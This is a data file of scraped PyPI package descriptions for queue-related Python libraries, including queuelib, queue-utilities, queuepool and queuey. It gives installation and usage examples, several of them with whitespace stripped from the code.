athttp://queueing-tool.readthedocs.org/.FeaturesFast simulation. Queueing-tool is designed to run very quickly;\nthe core algorithms were written incython.Visualizations. There are several tools that allow you to easily\nview congestion and movement within your network. This includes ready\nmade functions for animating network dynamics while your simulations\ntake place.Full documentation. Every function and class is fully documented\nbothonlineand in the\ndocstrings.Fast setup. The network is represented as anetworkx graph.\nQueueing-tool networks allow for probabilistic routing, finite\ncapacity queues, and different blocking protocols for analyzingloss networks.InstallationPrerequisites:Queueing-tool runs on Python 2.7 and 3.4-3.10, but\nchanges going forward are only tested against Python 3.6-3.10. Queueing-tool\nrequiresnetworkxandnumpy, and depends onmatplotlibif you want to plot.Installation: To install fromPyPIuse:pipinstallqueueing-toolThe above will automatically install networkx and numpy. 
If you want to plot use:pipinstallqueueing-tool[plotting]Note thatqueueing-toolusesnetworkx\u2019s pagerank implementation. As of\nnetworkx 2.8.6, they have several versions of the pagerank algorithm andqueueing-tooldefaults to using the version that requiresscipy. Ifscipyis not installed then it trys thenumpybased implementation.After installation, import queueing-tool with something like:importqueueing_toolasqtBugs and issuesThe issue tracker is athttps://github.com/djordon/queueing-tool/issues. Please report any bugs or issue that you find there. Of course, pull requests are always welcome.Copyright and licenseCode and documentation Copyright 2014-2022 Daniel Jordon. Code released\nunder theMIT\nlicense."} +{"package": "queueio", "pacakge-description": "queueio======Project descriptionRequirements------------Python 3.Install-------Install latest version: **pip install queueio**.Usage-----About-----"} +{"package": "queueless", "pacakge-description": "No description available on PyPI."} +{"package": "queuelib", "pacakge-description": "Queuelib is a Python library that implements object collections which are stored\nin memory or persisted to disk, provide a simple API, and run fast.Queuelib provides collections forqueues(FIFO),stacks(LIFO), queues\nsorted by priority and queues that are emptied in around-robinfashion.NoteQueuelib collections are not thread-safe.Queuelib supports Python 3.5+ and has no dependencies.InstallationYou can install Queuelib either via the Python Package Index (PyPI) or from\nsource.To install using pip:$ pip install queuelibTo install using easy_install:$ easy_install queuelibIf you have downloaded a source tarball you can install it by running the\nfollowing (as root):# python setup.py installFIFO/LIFO disk queuesQueuelib provides FIFO and LIFO queue implementations.Here is an example usage of the FIFO queue:>>> from queuelib import FifoDiskQueue\n>>> q = FifoDiskQueue(\"queuefile\")\n>>> q.push(b'a')\n>>> q.push(b'b')\n>>> q.push(b'c')\n>>> q.pop()\nb'a'\n>>> q.close()\n>>> q = FifoDiskQueue(\"queuefile\")\n>>> q.pop()\nb'b'\n>>> q.pop()\nb'c'\n>>> q.pop()\n>>>The LIFO queue is identical (API-wise), but importingLifoDiskQueueinstead.PriorityQueueA discrete-priority queue implemented by combining multiple FIFO/LIFO queues\n(one per priority).First, select the type of queue to be used per priority (FIFO or LIFO):>>> from queuelib import FifoDiskQueue\n>>> qfactory = lambda priority: FifoDiskQueue('queue-dir-%s' % priority)Then instantiate the Priority Queue with it:>>> from queuelib import PriorityQueue\n>>> pq = PriorityQueue(qfactory)And use it:>>> pq.push(b'a', 3)\n>>> pq.push(b'b', 1)\n>>> pq.push(b'c', 2)\n>>> pq.push(b'd', 2)\n>>> pq.pop()\nb'b'\n>>> pq.pop()\nb'c'\n>>> pq.pop()\nb'd'\n>>> pq.pop()\nb'a'RoundRobinQueueHas nearly the same interface and implementation as a Priority Queue except\nthat each element must be pushed with a (mandatory) key. 
Popping from the\nqueue cycles through the keys \u201cround robin\u201d.Instantiate the Round Robin Queue similarly to the Priority Queue:>>> from queuelib import RoundRobinQueue\n>>> rr = RoundRobinQueue(qfactory)And use it:>>> rr.push(b'a', '1')\n>>> rr.push(b'b', '1')\n>>> rr.push(b'c', '2')\n>>> rr.push(b'd', '2')\n>>> rr.pop()\nb'a'\n>>> rr.pop()\nb'c'\n>>> rr.pop()\nb'b'\n>>> rr.pop()\nb'd'Mailing listUse thescrapy-usersmailing list for questions about Queuelib.Bug trackerIf you have any suggestions, bug reports or annoyances please report them to\nour issue tracker at:http://github.com/scrapy/queuelib/issues/ContributingDevelopment of Queuelib happens at GitHub:http://github.com/scrapy/queuelibYou are highly encouraged to participate in the development. If you don\u2019t like\nGitHub (for some reason) you\u2019re welcome to send regular patches.All changes require tests to be merged.TestsTests are located inqueuelib/testsdirectory. They can be run usingnosetestswith the following command:nosetestsThe output should be something like the following:$ nosetests\n.............................................................................\n----------------------------------------------------------------------\nRan 77 tests in 0.145s\n\nOKLicenseThis software is licensed under the BSD License. See the LICENSE file in the\ntop distribution directory for the full license text.VersioningThis software followsSemantic Versioning"} +{"package": "queuelink", "pacakge-description": "The QueueLink library simplifies several queue patterns including linking queues together with one-to-many or many-to-one relationships, and supports reading and writing to text-based files.Interaction PatternA QueueLink is a one-way process that connects queues together. When two or more queues are linked, a sub-process is started to read from the \u201csource\u201d queue and write into the \u201cdestination\u201d queue.Circular references are not allowed, making QueueLink a \u2018directed acyclic graph\u2019, or DAG.Users create each queue, which must be instances ofmultiprocessing.Manager.JoinableQueue. 
Those queues can then be added to a QueueLink instance as either the source or destination.from multiprocessing import Manager\nfrom queuelink import QueueLink\n\n# Create the multiprocessing.Manager\nmanager = Manager()\n\n# Source and destination queues\nsource_q = manager.JoinableQueue()\ndest_q = manager.JoinableQueue()\n\n# Create the QueueLink\nqueue_link = QueueLink(name=\"my link\")\n\n# Connect queues to the QueueLink\nsource_id = queue_link.register_queue(queue_proxy=source_q,\n direction=\"source\")\ndest_id = queue_link.register_queue(queue_proxy=dest_q,\n direction=\"destination\")\n\n# Text to send\ntext_in = \"a\ud83d\ude02\" * 10\n\n# Add text to the source queue\nsource_q.put(text_in)\n\n# Retrieve the text from the destination queue!\ntext_out = dest_q.get()\nprint(text_out)"} +{"package": "queue-local", "pacakge-description": "queue-local"} +{"package": "queue-logger", "pacakge-description": "Set following Environment variables:QUEUE_HOST=QUEUE_BROKER_HOSTQUEUE_PORT=QUEUE_BROKER_PORTQUEUE_USER=QUEUE_BROKER_USERQUEUE_PASS=QUEUE_BROKER_PASSimportloggingfromQLGRimportcreate_loggerlogger=create_logger(__name__,logging.NOTSET)logger.info('This is an informational message.')logger.error('This is an error message.')Check your message broker (rabbitmq in this case), there must be 2 messages onlogsqueue."} +{"package": "queueman", "pacakge-description": "Queue managerWIPpython3-mpipinstallqueueman"} +{"package": "queueManager", "pacakge-description": "How to use this package?\nsee the following example\nfrom queueManager import queueManager\nqm = queueManager()\nqm.connect() #if no server is open,it will fail in seconds\na = qm.read() #blocks, until something in the queue can be read.\nprint(a)\ndata = \u2018test data\u2019\nqm.write(data)#write some data to the queue, notice that, the write and read queue are two different queues;"} +{"package": "queue-manager-api", "pacakge-description": "No description available on PyPI."} +{"package": "queue-map-reduce-sebastian-achim-mueller", "pacakge-description": "Queues for batch-jobs distribute your compute-tasks over multiple machines in parallel. This pool maps your tasks onto a queue and reduces the results.importqueue_map_reduceasqmrpool=qmr.Pool()results=pool.map(sum,[[1,2],[2,3],[4,5],])A drop-in-replacement for builtins\u2019map(), andmultiprocessing.Pool()\u2019smap().RequirementsProgramsqsub,qstat, andqdelare required to submit, monitor, and delete queue-jobs.Yourfunc(task)must be part of an importable python module.Yourtasksand theirresultsmust be able to serialize using pickle.Both worker-nodes and process-node can read and write from and to a common path in the file-system.Queue flavorTested flavors are:Sun Grid Engine (SGE) 8.1.9FeaturesRespects fair-share, i.e. slots are only occupied when the compute is done.No spawning of additional threads. Neither on the process-node, nor on the worker-nodes.No need for databases or web-servers.Queue-jobs with error-state'E'can be deleted, and resubmitted until your predefined upper limit is reached.Can bundle tasks on worker-nodes to avoid start-up-overhead with many small tasks.AlternativesWhen you do not share resources with other users, and when you have some administrative power you might want to use one of these:Daskhas ajob_queuewhich also supports other flavors such as PBS, SLURM.pyABC.sgehas asge.map()very much like our one.ipyparallelInner workingsmap()makes awork_dirbecause the mapping and reducing takes place in the file-system. 
You can setwork_dirmanually to make sure both worker-nodes and process-node can reach it.map()serializes yourtasksusingpickleinto separate files inwork_dir/{ichunk:09d}.pkl.map()reads all environment-variables in its process.map()creates the worker-node-script inwork_dir/worker_node_script.py. It contains and exports the process\u2019 environment-variables into the batch-job\u2019s context. It reads the chunk of tasks inwork_dir/{ichunk:09d}.pkl, imports and runs yourfunc(task), and finally writes the result back towork_dir/{ichunk:09d}.pkl.out.map()submits queue-jobs. Thestdoutandstderrof the tasks are written towork_dir/{ichunk:09d}.pkl.oandwork_dir/{ichunk:09d}.pkl.erespectively. By default,shutil.which(\"python\")is used to process the worker-node-script.When all queue-jobs are submitted,map()monitors their progress. In case a queue-job runs into an error-state ('E'by default) the job will be deleted and resubmitted until a maximum number of resubmissions is reached.When no more queue-jobs are running or pending,map()will reduce the results fromwork_dir/{ichunk:09d}.pkl.out.In case of non-zerostderrin any task, a missing result, or on the user\u2019s request, thework_dirwill be kept for inspection. Otherwise it is removed.Wordingtaskis a valid input tofunc. Thetasksare the actual payload to be processed.iterableis an iterable (list) oftasks. It is the naming adopted frommultiprocessing.Pool.map.itaskis the index of ataskiniterable.chunkis a chunk oftaskswhich is processed on a worker-node in serial.ichunkis the index of a chunk. It is used to create the chunk\u2019s filenames such aswork_dir/{ichunk:09d}.pkl.queue-jobis what we submit into the queue. Each queue-job processes the tasks in a single chunk in series.JB_job_numberis assigned to a queue-job by the queue-system for its own book-keeping.JB_nameis assigned to a queue-job by ourmap(). It is composed of ourmap()\u2019s session-id, andichunk. E.g.\"q\"%Y-%m-%dT%H:%M:%S\"#{ichunk:09d}\"Environment VariablesAll the user\u2019s environment-variables in the process wheremap()is called will be exported in the queue-job\u2019s context.The worker-node-script sets the environment-variables. We do not useqsub\u2019s argument-Vbecause on some clusters this will not set all variables. Apparently some administrators fear security issues when usingqsub-Vto setLD_LIBRARY_PATH.Testingpy.test-s.dummy queueTo test ourmap()we provide a dummyqsub,qstat, andqdel.\nThese are individualpython-scripts which all act on a common state-file intests/resources/dummy_queue_state.jsonin order to fake the sun-grid-engine\u2019s queue.dummy_qsub.pyonly appends queue-jobs to the list of pending jobs in the state-file.dummy_qdel.pyonly removes queue-jobs from the state-file.dummy_qstat.pydoes move the queue-jobs from the pending to the running list, and does trigger the actual processing of the jobs. Each timedummy_qstat.pyis called it performs a single action on the state-file. So it must be called multiple times to process all jobs.
It can intentionally bring jobs into the error-state when this is set in the state-file.Before running the dummy-queue, its state-file must be initialized:fromqueue_map_reduceimportdummy_queuedummy_queue.init_queue_state(path=\"tests/resources/dummy_queue_state.json\")When testing ourmap()you set its argumentsqsub_path,qdel_path, andqstat_pathto point to the dummy-queue.Seetests/test_full_chain_with_dummy_qsub.py.Because of the global state-file, only one instance of dummy_queue must run at a time."} +{"package": "queue-messaging", "pacakge-description": "No description available on PyPI."} +{"package": "queue-metrics", "pacakge-description": "queue-model-approxA repository of metrics that may apply to approximate queue models"} +{"package": "queue_mfc_manager", "pacakge-description": "No description available on PyPI."} +{"package": "queuepipeio", "pacakge-description": "This Python package provides two classes,QueuePipeIOandLimitedQueuePipeIO, that represent queue-based I/O objects. These\nclasses are ideal for multi-threaded or asynchronous programming where\ndata is produced in one thread or coroutine and consumed in another.InstallationYou can install this package from PyPI:pip install queuepipeioUsageHere\u2019s a basic example of how to useQueuePipeIOandLimitedQueuePipeIO:fromqueuepipeioimportQueuePipeIO,LimitedQueuePipeIO# Define MB as a constantMB=1024*1024# Create a QueuePipeIO objectqpio=QueuePipeIO(chunk_size=8*MB)# Write data to the queueqpio.write(b'Hello, world!')# Close the writerqpio.close()# Read data from the queuedata=qpio.read()print(data)# Outputs: b'Hello, world!'# Create a LimitedQueuePipeIO object with a memory limitlqpio=LimitedQueuePipeIO(memory_limit=16*MB,chunk_size=8*MB)# Write data to the queuelqpio.write(b'Hello, again!')# Close the writerlqpio.close()# Read data from the queuedata=lqpio.read()print(data)# Outputs: b'Hello, again!'ContributingContributions are welcome! 
Please feel free to submit a Pull Request."} +{"package": "queueplus", "pacakge-description": "QueuePlus \u27951\ufe0f\u20e3 version: 0.7.0\u270d\ufe0f author: Mitchell LisleA Python library that adds functionality to asyncio queuesInstallpipinstallqueueplusUsageYou can use AioQueue with all the same functionality as a regularasyncio.Queue.fromqueueplusimportAioQueueq=AioQueue()awaitq.put(\"hello world\")message=awaitq.get()# hello worldWith a few extra capabilitiesIterate over a queue (can be async or not)fromqueueplusimportAioQueueq=AioQueue()[awaitq.put(i)foriinrange(10)]# in non-async mode you would call q.put_nowaitasyncforrowinq:print(row)Collect all values into a listfromqueueplusimportAioQueueq=AioQueue()[awaitq.put(i)foriinrange(10)]messages=q.collect()# [0, 1, 2, 3, 4 ,5 ,6 ,7, 8, 9]Create a callback everytime a message is addedfromqueueplusimportAioQueueinq=AioQueue()outq=AioQueue()asyncdefcopy_to_q(message:str):awaitoutq.put(message)inq.add_consumer(copy_to_q)inq.put(\"hello world\")awaitinq.wait_for_consumer()Enforce a type on a queue, error if violatedfromqueueplusimportTypedAioQueue,RaiseOnViolationq=TypedAioQueue(int,violations_strategy=RaiseOnViolation)[awaitq.put(i)foriinrange(10)]messages=q.collect()# [0, 1, 2, 3, 4 ,5 ,6 ,7, 8, 9]awaitq.put(\"hello\")# Raises a ViolationErrorEnforce a type on a queue, ignore if violatedfromqueueplusimportTypedAioQueue,DiscardOnViolationq=TypedAioQueue(int,violations_strategy=DiscardOnViolation)[awaitq.put(i)foriinrange(10)]awaitq.put(\"hello\")messages=q.collect()# [0, 1, 2, 3, 4 ,5 ,6 ,7, 8, 9]Full examplefromqueueplusimportAioQueueimportasyncioasyncdefmain():q=AioQueue()awaitq.put(\"hello\")awaitq.put(\"world\")asyncforiteminq:print(item)if__name__==\"__main__\":asyncio.run(main())"} +{"package": "queuepool", "pacakge-description": "The main problem with psycopg2.pool (https://github.com/psycopg/psycopg2/blob/master/lib/pool.py), for example, is that the pool raises an exception (instead of blocking) when there are no more connections in the pool, and you either have to match the number of connections to the number of workers, or implement retry logic. Also, it doesn\u2019t implement connection recycling (on timeout or usage count), and therefore, doesn\u2019t fully address issue with stale connections and suited less (scales worse) for large production installations.This implementation is based on synchronized queue (https://docs.python.org/3/library/queue.html), and thus multithred safe. This is a streamlined port from Java version that was implemented about ten years ago and that has since then been running in heavy production evironment of one of our financial clients.This implementation features:A pool of generic resources that can be extended for specific resources like psycopg2 connections. Psycopg2 connection pool implementation is provided.On-demand lazy resource opening.Idle and open timeout recycling. Requires user code to executepool.recycle()method periodically (or start recycler thread bypool.startRecycler()), for example, once a minute. 
If this method isn\u2019t executed periodically, then the recycling is performed only when the resources are either taken or returned to the pool, and therefore, the pool can accumulate a number of idle connections that exceed the idle or open timeouts.Usage count recycling.Recycling on exception.Recycling on a resource status.Context manager support allows the pool to be used with the \u201cwith\u201d statement so that the resources are returned safely to the pool.LIFO queue helps the pool keep the number of open resources to a minimum.This pool can be utilized successfully in large production installations as it tries to keep the number of open resources to the minimum, while still providing a sufficient number of \u201chot\u201d (open) resources to avoid open/close cost.LicenseOSI Approved 3 clause BSD LicensePrerequisitesPython 3.7+ (with queue)For psycopg2 connections: psycopg2 2.8.2+InstallationIf prerequisites are met, you can installqueuepoollike any other Python package, using pip to download it from PyPI:$ pip install queuepoolor usingsetup.pyif you have downloaded the source package locally:$ python setup.py build\n$ sudo python setup.py install"} +{"package": "queue-processor", "pacakge-description": "queue_processor Python3 QueueHomepage:https://www.learningtopi.com/python-modules-applications/queue_processor/This package is a simple threading based queue manager. A queue can be created\nwith a specific maximum length as well as default command and final callback functions.\nWhen an item is added to the queue, the queue_processor will create a thread to execute\nthe command function that was either provided when the item was added, or the default\nfunction for the queue. Arguments will be passed to the function and the return\nvalue will be captured. If a final callback function is provided, the return value\nas well as the status will be returned along with a copy of the arguments.
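To make that flow concrete, the underlying pattern is simply 'run the command function in a worker thread, then hand its return value and a status to the final callback'. The sketch below illustrates only that generic idea with the standard threading module; it is not the queue_processor API itself (the package's own usage example follows below):

import threading

def double(x):
    return x * 2

def finished(return_value, status, **kwargs):
    print('result:', return_value, 'status:', status, 'args:', kwargs)

def _run_item(command_func, callback_func, kwargs):
    # Run the command function, capture its return value, then report both
    # the value and a status string to the final callback.
    try:
        return_value, status = command_func(**kwargs), 'OK'
    except Exception as exc:  # the real library also reports TIMEOUT/EXPIRED states
        return_value, status = exc, 'EXCEPTION'
    callback_func(return_value, status, **kwargs)

threading.Thread(target=_run_item, args=(double, finished, {'x': 21})).start()

queue_processor layers the FIFO queue, maximum length, per-task delay and timeout handling on top of this basic thread-plus-callback pattern.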
The callback will provide the return value of the command function (if any) as well as a status that will be one of the following:OK: Command function completed (may or may not be successful in your view, but the function completed and did not raise any errors)TIMEOUT: If the command function did not complete within the timeout period.EXPIRED: The item was NOT executed as it sat in the queue longer than the max time permitted.QUEUE_FULL: This is returned if a callback is provided when an item is attempted to be added but the queue is full. This item is NOT executed.EXCEPTION: An exception was raised during the execution of the callback. The exception is returned as the \"return_value\"Callback function parametersThe callback function must accept the \"return_value\" and \"status\" as positional arguments in that order. It is strongly recommended to include *args and **kwargs to catch all positional and keyword arguments that are sent after \"return_value\" and \"status\". The queue processor will send ALL arguments to the callback function that were also sent to the command function.NOTE: You may send objects as parameters that will be updated by the command function! You may also have the command function be a member of a class instance. This allows you to act on data within an instance of a class so passing objects may not be required.!!IMPORTANT!! The queue processor uses Python threads. In your command and callback function be sure to use thread locks appropriately if modifying data that may be accessed by a different thread. Also be sure not to create deadlocks!"} +{"package": "queuepy", "pacakge-description": "PyQueueA simple module lib to queue your lists!Usage:# List: The list you are going to transform into a queue# Length: The maximum size of the queue# Input: The input from the user (can be a input('')) or an strQueue(list,length,input)# Returns the simple queueQueue(list,length,input).input()# Returns the element that was addedQueue(list,length,input).output()# Returns the element that was removedQueue(list,length,input).infos()# or .info()# Returns the queue, the input and the output of the queue.How it worksInsert the wanted string onto the list if the maximum size of the list is less than the wanted size.If the size of the list is greater than the wanted size, pop out the last queue element and insert the wanted string.TODO:Add.create()functionwill create 2 buffers for temporary usage.e.g:Queue(q, 3, in).create(1)creates a new bufferinsidetheQueueclassitselfcan use.input(),.output()and.infos()cannot be referenced outside theQueueclass.Double-ReferencereturnMethodsallows the user to referenceQueuewithout needing toprint()it.also allows the user to referenceQueuewithprint().graph TD\n A[Read the input] -->|Verify if the size is less than the wanted|B(Insert string on the first position)\n B --> C{Check the queue}\n C -->|If the size is less|D[Insert at 0 and move the rest]\n C -->|If size is greater|E[Insert at 0 and pop the last]\n E --> F\n D --> F\n F{Rest of args}\n F --> |.input|H(print the new element)\n F --> |.output|G(print the removed element)\n F --> |info / infos|I(print the queue, the input and the output)"} +{"package": "queueq", "pacakge-description": "No description available on PyPI."} +{"package": "queuery-client", "pacakge-description": "queuery_client_pythonQueuery Redshift HTTP API Client for PythonInstallationpip install queuery-clientUsagePrerequisitesSet the following envronment variables to connect Queuery server:QUEUERY_TOKEN: Specify Queuery access 
tokenQUEUERY_TOKEN_SECRET: Specify Queuery secret access tokenQUEUERY_ENDPOINT: Specify a Queuery endpoint URL via environment variables if you don't set theendpointargument ofQueueryClientin you codeBasic Usagefromqueuery_clientimportQueueryClientclient=QueueryClient(endpoint=\"https://queuery.example.com\")response=client.run(\"select column_a, column_b from the_great_table\")# (a) iterate `response` naivelyforelemsinresponse:print(response)# (b) invoke `read()` to fetch all recordsprint(response.read())# (c) invoke `read()` with `use_pandas=True` (returns `pandas.DataFrame`)print(response.read(use_pandas=True))Type CastBy default,QueueryClientreturns all values asstrregardless of their definitions on Redshift.\nYou can use theenable_castoption to automatically convert types of the returned values into appropreate ones based on their definitions.fromqueuery_clientimportQueueryClientclient=QueueryClient(endpoint=\"https://queuery.example.com\",enable_cast=True,# Cast types of the returned values automatically!)sql=\"select 1, 1.0, 'hoge', true, date '2021-01-01', timestamp '2021-01-01', null\"response=client.run(sql)response.read()# => [[1, 1.0, 'hoge', True, datetime.date(2021, 1, 1), datetime.datetime(2021, 1, 1, 0, 0), None]]"} +{"package": "queues", "pacakge-description": "UNKNOWN"} +{"package": "queue_skardash", "pacakge-description": "UNKNOWN"} +{"package": "queue_status", "pacakge-description": "UNKNOWN"} +{"package": "queue-system", "pacakge-description": "No description available on PyPI."} +{"package": "queuetools", "pacakge-description": "This package provides the following scripts, which can configure AMQP brokers\nsuch as RabbitMQ:mkq - declares queues (queue.declare)mkx - declares exchanges (exchange.declare)bindq - binds queues to exchanges (queue.bind)unbindq - unbinds queues from exchanges (queue.unbind)rmq - removes queues (queue.delete)rmx - removes exchanges (exchange.delete)qcat - prints messages to stdout (channel.basic_consume)qpurge - purges all messages from a queue (channel.queue_purge)hammer - submits messages from the command line (channel.basic_publish)"} +{"package": "queue-tweets", "pacakge-description": "stream tweets to a queue for a finite amount of time that can be parallelized with a consumption process"} +{"package": "queueup", "pacakge-description": "QueueUp - A simple and easy queue interface for all of your needsQueueUp-- Is an entirely integrated queue interface over kombu to completely include all settings inside of a single object.The reason we usekombuand AMQP as a whole is to allow for complex objects and delivery guaruntees we normally wouldn't get with much newer platforms.Differences from QueueUp and QueueYou'd use theQueueUplibrary in the exact way you'd use thequeue.Queuelibrary. Let's look at the difference.An example for python'squeueimporttimeimportrandomimportthreadingfromqueueimportQueue# We're starting two threading daemons,# 1. one that pushes information into a queue,# 2. 
the other that reads information from the queue then publishes itdefqueue_pusher(q):whileTrue:q.put(random.randint(0,1000))time.sleep(0.05)defqueue_reciever(q):whileTrue:qitem=q.get(block=True)print(f\"Printing{item}\")time.sleep(0.05)if__name__==\"__main__\":common_queue=Queue()threading.Thread(target=queue_pusher,daemon=True,args=(common_queue,)).start()threading.Thread(target=queue_reciever,daemon=True,args=(common_queue,)).start()# Now the two queues will communicate with each other.whileTrue:time.sleep(5)An example forQueueUpimporttimeimportrandomimportthreadingfromqueueupimportQueue# We're starting two threading daemons,# 1. one that pushes information into a queue,# 2. the other that reads information from the queue then publishes itdefqueue_pusher(q):whileTrue:q.put(random.randint(0,1000))time.sleep(0.05)defqueue_reciever(q):whileTrue:qitem=q.get(block=True)print(f\"Printing{item}\")time.sleep(0.05)if__name__==\"__main__\":common_queue=Queue()# w/o parameters it returns a multiprocessing.Queue()threading.Thread(target=queue_pusher,daemon=True,args=(common_queue,)).start()threading.Thread(target=queue_reciever,daemon=True,args=(common_queue,)).start()# Now the two queues will communicate with each other.whileTrue:time.sleep(5)"} +{"package": "queue-util", "pacakge-description": "queue_utilA set of utilities for consuming (and producing) from a rabbitmq queueEnd of lifeThis project is not actively developed any more.Kombu has provided the ConsumerMixin utility for a very long time now. That abstraction allows to\ncode Consumers very similar to the one provided here with very little code, and much better\nhandling of errors, disconnections and the full range of features that Kombu has on offer.If you are still actively using this library and need support for it, please get in touch\nwith a GitHub issue or an email.DevelopmentTestingYou will need to have:a localDockerservicetoxinstalled (globally available)All supported versions of python installed (Pyenvis highly\nrecommended)tox [-p auto]ReleaseUpdateCHANGELOGto add new version and document itIn GitHub, create a new releaseName the releasev(for examplev1.2.3)Title the release with a highlight of the changesCopy changes in the release fromCHANGELOG.mdinto the release descriptionTravisCIwill package the release and publish it toPypi"} +{"package": "queue-utilities", "pacakge-description": "queue-utilitiesLet's make using Queues great again! Queue utilities and conveniences for those using sync libraries.Currently implements using threads and threading queues as standard, multiprocessing queues can be used by passing in relevant multiprocessing.Queue arguments. Worker threads use threading.Thread not multiprocessing.Process by design, if you require running eg Select in an external process as a message broker I recommend spawning a Process and then using as is documented.This utilities package contains the following classes:Pipe- Pipe messages from one queue to another.Timer- Threaded timer that emits time on internal or provided queue after given wait time period. Can be cancelled.Ticker- Same as timer but emits time at regular intervals until stopped.Multiplex- Many-to-One (fan-in) queue management helper.Multicast- One-to-Many (fan-out) queue management helper.Select- Like Multiplex but output payload contains message source queue to be used in dynamic message based switching. 
Inspired by Golangs select statements using channels.as_thread- Decorator to run function in thread.with_input_queue- Decorator to attach input and optional output queues to function which will be run in a thread.with_output_queue- Decorator that sends function results to output queue.Note that this package is early stages of development.Installationpython3-mpipinstallqueue-utilitiesUsagePipefromqueue_utilitiesimportPipeoriginal_q,output_q=_queue.Queue(),_queue.Queue()p=Pipe(original_q,output_q)# put an item into the original queueoriginal_q.put(1)# get the message off the output queuerecv=output_q.get()print(recv)# 1# don't forget to stop the pipe after you've finished.p.stop()Timerfromqueue_utilitiesimportTimer# emit time after 5 secondsfive_seconds=Timer(5)five_seconds.get()# cancel a timerto_cancel=Timer(60)print(to_cancel._is_finished)# Falseto_cancel.stop()print(to_cancel._is_finished)# TrueTickerfromqueue_utilitiesimportTicker# print the time every 5 seconds 4 timestick=Ticker(5)for_inrange(4):print(f\"The time is:{tick.get()}\")# cancel the ticker threadtick.stop()Multiplexfromqueue_utilitiesimportMultiplexfromqueueimportQueue# create two queues and pass them into the Multiplexqueue_a,queue_b=Queue(),Queue()multi_p=Multiplex(queue_a,queue_b)# send messages to any of the queuesqueue_a.put(\"a\")queue_b.put(\"b\")# read the messagesfor_inrange(2):message=multi_p()# or multi_p.get()print(f\"I got a message!{message}\")# cleanupmulti_p.stop()# if you try to read a message after stop# it raises a MultiplexClosed exceptionmulti_p.get()Multicastfromqueue_utilitiesimportMulticastfromqueueimportQueueout_a,out_b=Queue(),Queue()multicast=Multicast(out_a,out_b)multicast.send(\"A message!\")forqin(out_a,out_b):print(q.get())# prints \"A message!\" twice!multicast.stop()SelectUse with context to build a cancellable threadfromqueue_utilitiesimportSelectfromqueueimportQueuefromthreadingimportThreadout_a,cancel_sig=Queue(),Queue()defselector(*queues):withSelect(*queues)asselect:forwhich,messageinselect:ifwhichiscancel_sig:# stop select on any message on queue bselect.stop()else:print(f'Got a message{message}')Thread(target=selector,args=(out_a,cancel_sig)).start()out_a.put(1)out_a.put(2)out_a.put(3)cancel_sig.put('Bye')Timeout a function with TimerfromthreadingimportThreadimporttimefromqueueimportQueuefromqueue_utilitiesimportSelect,Timerdefdo_something_slow(q:Queue)->None:# do something slowtime.sleep(3)q.put(\"Done\")output_q=Queue()Thread(target=do_something_slow,args=(output_q,)).start()timeout=Timer(2)select=Select(output_q,timeout._output_q)for(which_q,result)inselect:ifwhich_qisoutput_q:print(\"Received result\",result)else:print(\"Function timed out!\")breakselect.stop()as_threadfromqueue_utilitiesimportas_threadimporttime@as_threaddefsleeper():time.sleep(5)print('Goodbye!')sleeper()print('Waiting...')time.sleep(6)print('Done!')with_input_queuefromqueue_utilitiesimportwith_input_queuefromqueueimportQueuework_queue=Queue()result_queue=Queue()@with_input_queue(work_queue,result_queue)defsquarer(input:int):returninput**2foriinrange(10):work_queue.put(i)print(f'{i}squared is{result_queue.get()}')with_output_queuefromqueue_utilitiesimportwith_input_queuefromqueueimportQueueresult_queue=Queue()@with_output_queue(result_queue)defsquarer(input:int):returninput**2foriinrange(10):squarer(i)print(f'{i}squared is{result_queue.get()}')ContributingPull requests are welcome. 
For major changes, please open an issue first to discuss what you would like to change.LicenseMIT"} +{"package": "queue_utils", "pacakge-description": "Utils for creating microservices around RabbitMQ"} +{"package": "queue-worker-local", "pacakge-description": "This is a package for sharing common crud operation to queue schema in the db"} +{"package": "queuey", "pacakge-description": "Read the full documentation athttp://queuey.readthedocs.org/Wat? Another message queue?Given the proliferation of message queue\u2019s, one could be inclined to believe\nthat inventing more is not the answer. Using an existing solution was\nattempted multiple times with most every existing message queue product.The others failed (for our use-cases).Queuey is meant to handle some unique conditions that most other message\nqueue solutions either don\u2019t handle, or handle very poorly. Many of them for\nexample are written for queues or pub/sub situations that don\u2019t require\npossibly longer term (multiple days) storage of not just many messages but\nhuge quantities of queues.Queuey Assumptions and Features:Messages may persist for upwards of 3 daysRange scans with timestamps to rewind and re-read messages in a queueMillions of queues may be createdMessage delivery characteristics need to be tweakable based on the\nspecific cost-benefit for a Queuey deploymentHTTP API for easy access by a variety of clients, including AJAXAuthentication system to support multiple \u2018Application\u2019 access to Queuey\nwith optional Browser-ID client authenticationA single deployment may support multiple Applications with varying\nmessage delivery characteristics, and authentication restricted queue\naccessQueuey can be configured with varying message guarantees, such as:Deliver once, and exactly onceDeliver at least once (and under rare conditions, maybe more)Deliver no more than once (and under rare conditions, possibly not deliver)Changing the storage back-end and deployment strategies directly affects\nthe message guarantee\u2019s. This enables the Queuey deployment to meet different\nrequirements and performance thresholds.For more background on Queuey, seethe Mozilla wiki section on queuey.RequirementsMake sure you have the following software already\ninstalled before proceeding:Java 1.6AntMakePython 2.7 (with virtualenv installed)InstallationAfter downloading the repository for the first time,\ncd into the directory and run:$ makeThis will do the following:Create a virtual python environmentInstall required python packages into this environmentCassandraTo run Queuey, you need a storage back-end for the queues. The default\nstorage back-end is Cassandra. This installation has been automated in\nQueuey\u2019s Makefile, to install Cassandra in the same directory as\nQueuey:make cassandraWhich will fetch the Cassandra server and set up the configuration.The default (Cassandra) stores its data and files inside the local Cassandra\ndirectory so as not to interfere with any existing Cassandra installations on\nthe system.RunningRunning the Cassandra Server:The message store (used by the server to route messages)\nand the HTTP server must be started separately. The steps\nare (starting from the root project directory)./bin/cassandra/bin/cassandra -p cassandra.pidTo shut it down at any point in the future:kill -2 `cat cassandra.pid`Running the Queuey Application:It is recommended that you copy theetc/queuey-dev.inifile to/etc/queuey.ini. 
